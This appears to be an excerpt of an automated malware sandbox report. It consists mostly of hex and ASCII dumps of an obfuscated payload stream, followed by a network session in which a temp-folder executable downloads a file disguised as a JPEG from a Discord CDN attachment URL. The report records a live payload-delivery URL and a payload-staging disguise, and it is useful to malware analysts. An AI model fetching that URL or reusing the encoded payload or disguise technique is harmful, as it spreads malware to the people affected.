20 78 20 4f 6f 78 20 78 20 52 59 20 78 20 4f 6f 78 20 78 20 4f 4f 4f 20 78 20 4b 74 20 78 20 4f 78 45 20 78 20 51 51 20 78 20 52 59 20 78 20 52 59 20 78 20
                                                            Data Ascii: KQ x kQ x Ooo x Yt x OxQ x OxE x tE x RY x OxE x RY x RY x OxR x kQ x kt x tY x Kt x Oxo x Kt x Kt x kR x Oxk x RR x OxQ x OxY x Qk x kt x tE x Kt x Oxo x Kt x Kt x YK x RR x kR x YY x RY x RY x Rt x Rk x Oox x RY x Oox x OOO x Kt x OxE x QQ x RY x RY x
                                                            2021-10-29 18:10:59 UTC2379INData Raw: 74 20 78 20 6b 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 59 20 78 20 74 4f 20 78 20 4f 78 52 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 52 20 78 20 6b 51 20 78 20 4f 4f 6b 20 78 20 52 6b 20 78 20 59 4b 20 78 20 74 4f 20 78 20 74 52 20 78 20 4f 4f 6f 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 45 20 78 20 74 6b 20 78 20 4f 78 45 20 78 20 59 78 20 78 20 52 52 20 78 20 4f 4f 4b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 4f 20 78 20 6b 52 20 78 20 6b 51 20 78 20 4f 4f 6b 20 78 20 52 6b 20 78 20 59 4b 20 78 20 74 6b 20 78 20 4f 4f 6b 20 78 20 4f 4f 6f 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 74 20 78 20 4f 4f 4f 20 78 20 59 52 20 78 20 6b 4f 20 78 20 74 74 20 78 20 52 59 20 78 20
                                                            Data Ascii: t x kt x RY x RY x RY x kY x tO x OxR x OOE x RY x OOQ x RY x RY x kR x kQ x OOk x Rk x YK x tO x tR x OOo x Kt x Kt x KE x tk x OxE x Yx x RR x OOK x RY x RY x RR x kO x kR x kQ x OOk x Rk x YK x tk x OOk x OOo x Kt x Kt x Yt x OOO x YR x kO x tt x RY x
                                                            2021-10-29 18:10:59 UTC2395INData Raw: 20 52 59 20 78 20 74 51 20 78 20 74 6b 20 78 20 6b 6f 20 78 20 4f 4f 6b 20 78 20 4b 45 20 78 20 74 6b 20 78 20 74 6b 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 74 20 78 20 4b 74 20 78 20 59 4f 20 78 20 6b 4f 20 78 20 4f 78 74 20 78 20 52 6b 20 78 20 74 78 20 78 20 4f 78 6f 20 78 20 4f 4f 4f 20 78 20 74 4f 20 78 20 59 78 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 52 59 20 78 20 74 4f 20 78 20 51 74 20 78 20 52 6b 20 78 20 74 4b 20 78 20 52 6b 20 78 20 59 6f 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 59 52 20 78 20 6b 4f 20 78 20 74 74 20 78 20 4f 78 59 20 78 20 59 52 20 78 20 4f 78 78 20 78 20 4f 78 4f 20 78 20 4f 4f 51 20 78 20 4b 51 20 78 20 51 74 20 78 20 74 52 20 78 20 74 74 20 78 20 52 6b 20 78 20 4f 4f 6b 20 78 20 6b 74 20 78 20 4f 78 6f 20 78 20 52 51
                                                            Data Ascii: RY x tQ x tk x ko x OOk x KE x tk x tk x RY x RR x kt x Kt x YO x kO x Oxt x Rk x tx x Oxo x OOO x tO x Yx x Oxt x RY x RY x tO x Qt x Rk x tK x Rk x Yo x RY x OxE x YR x kO x tt x OxY x YR x Oxx x OxO x OOQ x KQ x Qt x tR x tt x Rk x OOk x kt x Oxo x RQ
                                                            2021-10-29 18:10:59 UTC2411INData Raw: 78 20 52 59 20 78 20 4f 78 59 20 78 20 59 4f 20 78 20 6b 59 20 78 20 74 45 20 78 20 4f 78 45 20 78 20 59 52 20 78 20 6b 4f 20 78 20 74 74 20 78 20 51 78 20 78 20 4f 4f 4f 20 78 20 4f 78 74 20 78 20 59 59 20 78 20 4f 78 45 20 78 20 59 52 20 78 20 6b 51 20 78 20 52 51 20 78 20 4f 6f 78 20 78 20 4b 6b 20 78 20 6b 6b 20 78 20 59 6f 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 78 20 78 20 59 52 20 78 20 59 78 20 78 20 4f 78 52 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 59 6f 20 78 20 59 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 4f 20 78 20 51 6b 20 78 20 59 52 20 78 20 51 74 20 78 20 74 45 20 78 20 4f 6f 6f 20 78 20 74 6b 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 4f 20
                                                            Data Ascii: x RY x OxY x YO x kY x tE x OxE x YR x kO x tt x Qx x OOO x Oxt x YY x OxE x YR x kQ x RQ x Oox x Kk x kk x Yo x RY x OxE x RY x RY x RY x kx x YR x Yx x OxR x kQ x kk x Yo x Yt x Kt x Kt x Kt x Kt x YO x Qk x YR x Qt x tE x Ooo x tk x kO x RY x RR x OOO
                                                            2021-10-29 18:10:59 UTC2427INData Raw: 20 52 51 20 78 20 52 51 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 59 6f 20 78 20 74 74 20 78 20 59 74 20 78 20 51 51 20 78 20 74 74 20 78 20 6b 6f 20 78 20 52 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 4b 51 20 78 20 52 52 20 78 20 4f 78 4f 20 78 20 4f 78 4b 20 78 20 6b 4f 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 78 59 20 78 20 4f 4f 51 20 78 20 4b 51 20 78 20 4f 4f 4f 20 78 20 4f 6f 78 20 78 20 52 51 20 78 20 52 51 20 78 20 52 59 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 6b 78 20 78 20 52 59 20 78 20 4f 78 4b 20 78 20 51 51 20 78 20 4f 78 6b 20 78 20 6b 6b 20 78 20 4f 78 6f 20 78 20 4f 78 4b 20 78 20 52 74 20 78 20 74 52 20 78 20 74 78 20 78 20 6b 74 20 78 20 52 6b 20 78 20 52 51 20 78 20 6b 4f 20 78 20 6b 4f
                                                            Data Ascii: RQ x RQ x RY x OOQ x Yo x tt x Yt x QQ x tt x ko x RR x RY x RY x RR x KQ x RR x OxO x OxK x kO x Kt x Kt x Kt x Kt x OxY x OOQ x KQ x OOO x Oox x RQ x RQ x RY x kR x OxR x kx x RY x OxK x QQ x Oxk x kk x Oxo x OxK x Rt x tR x tx x kt x Rk x RQ x kO x kO
                                                            2021-10-29 18:10:59 UTC2443INData Raw: 20 74 78 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 74 4b 20 78 20 4f 78 4f 20 78 20 51 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 51 20 78 20 4f 78 51 20 78 20 74 6b 20 78 20 4f 78 4b 20 78 20 4f 78 78 20 78 20 4f 78 52 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4f 20 78 20 59 45 20 78 20 4b 74 20 78 20 6b 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 6f 20 78 20 59 78 20 78 20 74 78 20 78 20 59 52 20 78 20 6b 78 20 78 20 59 4f 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 51 20 78 20 52 74 20 78 20 74 6b 20 78 20 4f 4f 6b 20 78 20 4f 78 78 20 78 20 4f 78 52 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4f 20 78 20 4f 78 4f 20 78 20 4b 6b 20 78 20 4f 4f 59 20 78 20 52 59 20 78 20 52 59 20 78
                                                            Data Ascii: tx x Rk x OOO x tK x OxO x Qk x Kt x Kt x KQ x OxQ x tk x OxK x Oxx x OxR x OOK x Kt x Kt x Kt x OOO x YE x Kt x kk x Kt x Kt x Yo x Yx x tx x YR x kx x YO x Kt x Kt x KQ x Rt x tk x OOk x Oxx x OxR x OOK x Kt x Kt x Kt x OOO x OxO x Kk x OOY x RY x RY x
                                                            2021-10-29 18:10:59 UTC2459INData Raw: 59 52 20 78 20 74 78 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4f 78 78 20 78 20 4f 78 6f 20 78 20 6b 45 20 78 20 74 52 20 78 20 6b 6f 20 78 20 4f 78 6f 20 78 20 4f 78 52 20 78 20 4b 74 20 78 20 4f 78 78 20 78 20 6b 4f 20 78 20 4f 78 52 20 78 20 4b 74 20 78 20 4f 4f 52 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 4b 51 20 78 20 74 74 20 78 20 6b 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 6f 20 78 20 6b 78 20 78 20 52 51 20 78 20 52 51 20 78 20 74 78 20 78 20 59 74 20 78 20 51 6b 20 78 20 4f 6f 4f 20 78 20 51 51 20 78 20 74 45 20 78 20 52 51 20 78 20 52 59 20 78 20 74 78 20 78 20 74 78 20 78 20 6b 4b 20 78 20 6b 52 20 78 20 4f 6f 6f 20 78 20 6b 78 20 78 20 4b 74 20 78 20 74 51 20 78
                                                            Data Ascii: YR x tx x Rk x Kt x Oxx x Oxo x kE x tR x ko x Oxo x OxR x Kt x Oxx x kO x OxR x Kt x OOR x OOE x RY x Rt x RY x RY x Rk x OOO x KQ x tt x kK x Kt x Kt x Yo x kx x RQ x RQ x tx x Yt x Qk x OoO x QQ x tE x RQ x RY x tx x tx x kK x kR x Ooo x kx x Kt x tQ x
                                                            2021-10-29 18:10:59 UTC2475INData Raw: 74 6b 20 78 20 4f 78 74 20 78 20 4f 78 59 20 78 20 59 52 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 6b 59 20 78 20 74 78 20 78 20 52 74 20 78 20 74 52 20 78 20 6b 4f 20 78 20 59 78 20 78 20 6b 4f 20 78 20 6b 78 20 78 20 4f 4f 52 20 78 20 4f 4f 51 20 78 20 4f 78 4b 20 78 20 4f 78 51 20 78 20 4f 78 4b 20 78 20 51 51 20 78 20 4f 78 6b 20 78 20 4b 6b 20 78 20 52 52 20 78 20 4f 78 51 20 78 20 51 74 20 78 20 52 6b 20 78 20 4b 45 20 78 20 6b 45 20 78 20 52 52 20 78 20 4b 51 20 78 20 52 6b 20 78 20 6b 74 20 78 20 4f 78 4b 20 78 20 6b 4f 20 78 20 4f 6f 6f 20 78 20 4b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 59 20 78 20 74 51 20 78 20 4f 78 52 20 78 20 4f 78 6b 20 78 20 74 51 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 74 20 78 20 6b 52 20 78 20
                                                            Data Ascii: tk x Oxt x OxY x YR x OOk x Kt x kY x tx x Rt x tR x kO x Yx x kO x kx x OOR x OOQ x OxK x OxQ x OxK x QQ x Oxk x Kk x RR x OxQ x Qt x Rk x KE x kE x RR x KQ x Rk x kt x OxK x kO x Ooo x Kk x RY x RY x kY x tQ x OxR x Oxk x tQ x OxE x RY x RY x kt x kR x
                                                            2021-10-29 18:10:59 UTC2491INData Raw: 78 20 78 20 52 6b 20 78 20 4b 74 20 78 20 74 78 20 78 20 6b 74 20 78 20 52 6b 20 78 20 52 52 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 74 20 78 20 74 4b 20 78 20 4f 78 4b 20 78 20 4f 4f 45 20 78 20 4f 78 45 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 4f 20 78 20 59 4b 20 78 20 4f 6f 4f 20 78 20 52 52 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 6b 74 20 78 20 4f 4f 4f 20 78 20 52 52 20 78 20 51 74 20 78 20 4f 78 4b 20 78 20 4f 78 6b 20 78 20 4f 4f 45 20 78 20 52 51 20 78 20 74 4f 20 78 20 4f 4f 4f 20 78 20 6b 4f 20 78 20 4b 74 20 78 20 59 74 20 78 20 6b 52 20 78 20 6b 6b 20 78 20 6b 59 20 78 20 74 45 20 78 20 4f 78 51 20 78 20 74 4f 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 78 20 78
                                                            Data Ascii: x x Rk x Kt x tx x kt x Rk x RR x kO x RY x Rt x tK x OxK x OOE x OxE x Rt x RY x RY x RR x kO x YK x OoO x RR x OOE x RY x kt x OOO x RR x Qt x OxK x Oxk x OOE x RQ x tO x OOO x kO x Kt x Yt x kR x kk x kY x tE x OxQ x tO x OOE x RY x tE x RY x RY x kx x
                                                            2021-10-29 18:10:59 UTC2507INData Raw: 78 20 52 52 20 78 20 4f 78 51 20 78 20 4f 78 59 20 78 20 4f 6f 78 20 78 20 4f 4f 51 20 78 20 74 59 20 78 20 51 78 20 78 20 4f 4f 4f 20 78 20 4f 78 74 20 78 20 51 74 20 78 20 6b 4f 20 78 20 4f 78 74 20 78 20 74 52 20 78 20 4b 74 20 78 20 6b 4b 20 78 20 4f 78 6f 20 78 20 4f 6f 78 20 78 20 4b 51 20 78 20 59 52 20 78 20 4f 4f 4f 20 78 20 59 78 20 78 20 6b 74 20 78 20 52 6b 20 78 20 52 51 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 4f 78 6b 20 78 20 59 74 20 78 20 4b 74 20 78 20 74 4f 20 78 20 51 74 20 78 20 74 52 20 78 20 74 6f 20 78 20 52 59 20 78 20 4f 4f 6f 20 78 20 4f 78 51 20 78 20 4f 78 59 20 78 20 6b 6f 20 78 20 4f 4f 6f 20 78 20 52 74 20 78 20 6b 4f 20 78 20 4f 4f 6b 20 78 20 59 74 20 78 20 74 6b 20 78 20 4b 74 20 78 20 74 6f
                                                            Data Ascii: x RR x OxQ x OxY x Oox x OOQ x tY x Qx x OOO x Oxt x Qt x kO x Oxt x tR x Kt x kK x Oxo x Oox x KQ x YR x OOO x Yx x kt x Rk x RQ x tE x RY x RY x tE x Oxk x Yt x Kt x tO x Qt x tR x to x RY x OOo x OxQ x OxY x ko x OOo x Rt x kO x OOk x Yt x tk x Kt x to
                                                            2021-10-29 18:10:59 UTC2523INData Raw: 78 20 59 52 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 59 78 20 78 20 74 78 20 78 20 59 74 20 78 20 6b 78 20 78 20 59 4f 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 51 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 4f 78 52 20 78 20 4f 4f 4b 20 78 20 4f 4f 78 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 6f 20 78 20 59 78 20 78 20 74 78 20 78 20 59 74 20 78 20 6b 78 20 78 20 59 4f 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 51 20 78 20 52 52 20 78 20 6b 6b 20 78 20 59 4b 20 78 20 74 74 20 78 20 51 51 20 78 20 4f 78 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 74 6b 20 78 20 6b 6f 20 78 20 74 78 20 78 20 59 6f 20 78 20 6b 74 20 78 20 6b 59 20 78 20 74 78 20 78 20 4f 78 6f 20 78 20 4f 4f 4f 20 78 20 6b 51 20 78 20 52 52 20 78 20 59 52 20 78 20 52
                                                            Data Ascii: x YR x RY x RY x tE x Yx x tx x Yt x kx x YO x Kt x Kt x KQ x Rk x OOO x OxR x OOK x OOx x Kt x Kt x Yo x Yx x tx x Yt x kx x YO x Kt x Kt x KQ x RR x kk x YK x tt x QQ x Oxo x RY x RY x Rt x tk x ko x tx x Yo x kt x kY x tx x Oxo x OOO x kQ x RR x YR x R
                                                            2021-10-29 18:10:59 UTC2539INData Raw: 6b 6b 20 78 20 6b 4f 20 78 20 6b 59 20 78 20 74 45 20 78 20 4b 51 20 78 20 74 78 20 78 20 59 78 20 78 20 74 78 20 78 20 52 74 20 78 20 74 6b 20 78 20 6b 6f 20 78 20 4f 78 4f 20 78 20 52 52 20 78 20 6b 4f 20 78 20 4b 74 20 78 20 59 4f 20 78 20 6b 6b 20 78 20 4f 4f 51 20 78 20 59 4b 20 78 20 74 59 20 78 20 6b 4b 20 78 20 59 45 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 45 20 78 20 52 6b 20 78 20 4f 6f 78 20 78 20 52 52 20 78 20 6b 6f 20 78 20 4f 4f 4f 20 78 20 4b 74 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 59 78 20 78 20 74 78 20 78 20 4f 6f 4f 20 78 20 4f 78 6f 20 78 20 59 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 51 20 78 20 74 6b 20 78 20 6b 4f 20 78 20 4f 78 59 20 78 20 74 4b 20 78 20 59 4f 20 78 20 74 45
                                                            Data Ascii: kk x kO x kY x tE x KQ x tx x Yx x tx x Rt x tk x ko x OxO x RR x kO x Kt x YO x kk x OOQ x YK x tY x kK x YE x Kt x Kt x KE x Rk x Oox x RR x ko x OOO x Kt x OxE x RY x RY x RY x tE x Yx x tx x OoO x Oxo x YY x Kt x Kt x KQ x tk x kO x OxY x tK x YO x tE
                                                            2021-10-29 18:10:59 UTC2555INData Raw: 20 78 20 4f 78 6f 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 6f 6f 20 78 20 4f 78 6b 20 78 20 4f 78 78 20 78 20 4b 74 20 78 20 74 45 20 78 20 4f 4f 59 20 78 20 4b 51 20 78 20 4b 51 20 78 20 74 74 20 78 20 52 52 20 78 20 52 59 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 78 4b 20 78 20 59 6f 20 78 20 59 78 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 52 20 78 20 59 4f 20 78 20 6b 4f 20 78 20 74 78 20 78 20 4b 74 20 78 20 4b 51 20 78 20 6b 6b 20 78 20 59 52 20 78 20 59 4b 20 78 20 4f 4f 51 20 78 20 74 52 20 78 20 4b 74 20 78 20 4b 51 20 78 20 4f 4f 4f 20 78 20 4f 78 51 20 78 20 74 78 20 78 20 4f 4f 6b 20 78 20 74 6f 20 78 20 59 4f 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 6f 20 78 20 4b 51 20 78 20 74 78 20 78 20 4b 74 20 78 20 74 78 20 78 20 52
                                                            Data Ascii: x Oxo x Kt x Kt x Ooo x Oxk x Oxx x Kt x tE x OOY x KQ x KQ x tt x RR x RY x RY x tO x OxK x Yo x Yx x Oxt x RY x RY x kR x YO x kO x tx x Kt x KQ x kk x YR x YK x OOQ x tR x Kt x KQ x OOO x OxQ x tx x OOk x to x YO x Kt x Kt x Yo x KQ x tx x Kt x tx x R
                                                            2021-10-29 18:10:59 UTC2571INData Raw: 6b 51 20 78 20 59 74 20 78 20 6b 78 20 78 20 52 59 20 78 20 52 52 20 78 20 4b 51 20 78 20 52 74 20 78 20 74 78 20 78 20 4f 78 78 20 78 20 4f 4f 4f 20 78 20 59 4f 20 78 20 74 6b 20 78 20 4f 4f 52 20 78 20 52 59 20 78 20 52 59 20 78 20 74 51 20 78 20 4f 4f 52 20 78 20 4f 78 4b 20 78 20 51 78 20 78 20 4f 78 52 20 78 20 4b 6b 20 78 20 4b 45 20 78 20 52 59 20 78 20 74 6f 20 78 20 6b 59 20 78 20 74 45 20 78 20 6b 52 20 78 20 59 78 20 78 20 4f 78 52 20 78 20 4f 4f 4f 20 78 20 59 78 20 78 20 4b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 59 4b 20 78 20 4b 51 20 78 20 74 6b 20 78 20 4f 78 51 20 78 20 6b 78 20 78 20 6b 45 20 78 20 74 45 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 6b 6f 20 78 20 6b 52 20 78 20 4f 4f 45 20 78 20 52 6b 20 78 20 74 4f 20 78 20 4f 78 52 20
                                                            Data Ascii: kQ x Yt x kx x RY x RR x KQ x Rt x tx x Oxx x OOO x YO x tk x OOR x RY x RY x tQ x OOR x OxK x Qx x OxR x Kk x KE x RY x to x kY x tE x kR x Yx x OxR x OOO x Yx x Kk x RY x RY x YK x KQ x tk x OxQ x kx x kE x tE x RY x Oxx x ko x kR x OOE x Rk x tO x OxR
                                                            2021-10-29 18:10:59 UTC2587INData Raw: 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78
                                                            Data Ascii: RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x
                                                            2021-10-29 18:10:59 UTC2603INData Raw: 20 74 45 20 78 20 52 59 20 78 20 51 6b 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 74 6f 20 78 20 74 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 74 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 4b 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 51 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 74 6b 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 4b 6b 20 78 20 52 59 20 78 20 74 6f 20 78 20 4f 78 45 20 78 20 52 59 20
                                                            Data Ascii: tE x RY x Qk x RY x RR x Oxk x RY x to x tt x RY x RY x RY x RY x RY x RY x Rt x RY x RY x tR x RY x RY x RY x RY x RY x RY x RY x tK x kO x RR x Oxt x RY x Rt x RY x RY x tE x RY x RY x Oxk x RY x RQ x Oxt x RY x tk x OxE x RY x Kk x RY x to x OxE x RY
                                                            2021-10-29 18:10:59 UTC2619INData Raw: 4f 59 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 51 51 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 78 4b 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 51 78 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 6f 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 6f 20 78 20 52 59 20 78 20 51 78 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 59 74 20 78 20 52 59 20 78 20 52 74 20 78 20 74 45 20 78 20 52 59 20 78 20 74 6b 20 78 20 6b 4f 20 78 20 52 59 20 78 20 4f 78 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 59 6f 20 78 20 52 59 20 78 20 6b 78 20 78 20 52 59 20 78 20 52 52 20 78 20 4b 6b 20 78 20 52 59 20 78 20 74 6f 20 78 20 74 45 20 78 20 52 59 20 78 20 74 4b 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78
                                                            Data Ascii: OY x RY x tO x OOQ x RY x QQ x RY x RR x OxK x RY x tO x kO x RY x Qx x RY x RR x OOo x RY x tO x Yo x RY x Qx x OOQ x RY x Yt x RY x Rt x tE x RY x tk x kO x RY x OxY x RY x Rk x Yo x RY x kx x RY x RR x Kk x RY x to x tE x RY x tK x kO x RR x Ooo x RY x
                                                            2021-10-29 18:10:59 UTC2627INData Raw: 52 52 20 78 20 4f 4f 78 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 51 51 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4b 6b 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 51 51 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 74 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 6b 6f 20 78 20 6b 4f 20 78 20 52 52 20 78 20 52 52 20 78 20 52 59 20 78 20 74 78 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 6b 78 20 78 20 6b 4f 20 78 20 52 59 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 6b 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 74 52 20 78 20 4f 78 45 20 78 20 52 59 20 78
                                                            Data Ascii: RR x OOx x RY x tO x Oxt x RY x QQ x OOQ x RR x Kk x RY x tO x kY x RY x QQ x OxE x RR x Ooo x RY x Rk x OOO x RY x tE x RY x RY x tk x RY x RY x OOO x RY x ko x kO x RR x RR x RY x tx x OxE x RY x kx x kO x RY x Oxk x RY x Rk x OxE x RY x tR x OxE x RY x
                                                            2021-10-29 18:10:59 UTC2643INData Raw: 20 4f 4f 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 74 45 20 78 20 59 4b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 6f 20 78 20 4f 4f 74 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 52 6b 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 45 20 78 20 59 45 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 74 20 78 20 74 51 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 59 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 74 45 20 78 20 59 45 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 6f 20 78 20 74 51 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 52 20 78 20 6b 4b 20 78 20 4f 78 6b 20 78 20 52 59 20
                                                            Data Ascii: OOO x RY x RY x Rk x tE x YK x RY x RY x RY x to x OOt x kY x RY x RY x Rk x Rk x Oxk x RY x RY x RY x KE x YE x kO x RY x RY x kt x tQ x kY x RY x RY x tO x YY x Oxk x RY x RY x Rt x tE x YE x kO x RY x RY x OOo x tQ x kY x RY x RY x tR x kK x Oxk x RY


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4192.168.2.549827162.159.133.233443C:\Users\user\AppData\Local\Temp\77DC.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2021-10-29 18:10:59 UTC2652OUTGET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1
                                                            Host: cdn.discordapp.com
                                                            2021-10-29 18:11:00 UTC2653INHTTP/1.1 200 OK
                                                            Date: Fri, 29 Oct 2021 18:10:59 GMT
                                                            Content-Type: image/jpeg
                                                            Content-Length: 345655
                                                            Connection: close
                                                            CF-Ray: 6a5e5d24ccc26904-FRA
                                                            Accept-Ranges: bytes
                                                            Age: 86643
                                                            Cache-Control: public, max-age=31536000
                                                            ETag: "d05714d4497c7b55b2c0b1609cbd62c9"
                                                            Expires: Sat, 29 Oct 2022 18:10:59 GMT
                                                            Last-Modified: Tue, 26 Oct 2021 11:56:34 GMT
                                                            Vary: Accept-Encoding
                                                            CF-Cache-Status: HIT
                                                            Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            Cf-Bgj: h2pri
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            x-goog-generation: 1635249394465681
                                                            x-goog-hash: crc32c=to49mQ==
                                                            x-goog-hash: md5=0FcU1El8e1WywLFgnL1iyQ==
                                                            x-goog-metageneration: 1
                                                            x-goog-storage-class: STANDARD
                                                            x-goog-stored-content-encoding: identity
                                                            x-goog-stored-content-length: 345655
                                                            X-GUploader-UploadID: ADPycds4sIyz_GzjIugLy9_WqK029_2RU2KSIIfGlpMQJZx1WvXGDydhZDvUpsH4QNomt1ATbnkYUYcRxSnB_xGGebc
                                                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
